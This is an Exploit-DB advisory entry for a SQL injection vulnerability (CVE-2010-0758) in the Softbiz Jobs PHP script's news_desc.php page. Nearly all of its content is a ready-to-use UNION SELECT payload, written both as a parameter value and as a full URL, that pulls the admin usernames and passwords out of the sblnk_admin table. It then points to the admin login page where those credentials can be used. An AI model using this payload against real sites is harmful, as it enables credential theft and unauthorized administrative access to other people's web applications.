Softbiz Jobs news_desc SQL Injection Vulnerability

2010-02-22T00:00:00
ID EDB-ID:11518
Type exploitdb
Reporter BAYBORA
Modified 2010-02-22T00:00:00

Description

Softbiz Jobs ( news_desc) SQL Injection Vulnerability. CVE-2010-0758. Webapps exploit for php platform

                                        
                                            Softbiz Jobs ( news_desc) SQL Injection Vulnerability

########################### 
Author    : Baybora

Homepage  : http://www.1923turk.com 

Blog      : http://baybora.wordpress.com/

Script    : softbizscripts

Download  : http://www.softbizscripts.com/

########################### 
  
Exploat  :news_desc.php?id=SQL 
   

-4+union+select+1,concat(username,0x3a,password),3,4,5+from+sblnk_admin--
  
  
  
http://server/news_desc.php?id=-4+union+select+1,concat(username,0x3a,password),3,4,5+from+sblnk_admin--
  
 
http://xxxx/admin
 
  
##############################################################  
# Greetz: Manas58 - Gamoscu - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO  
##############################################################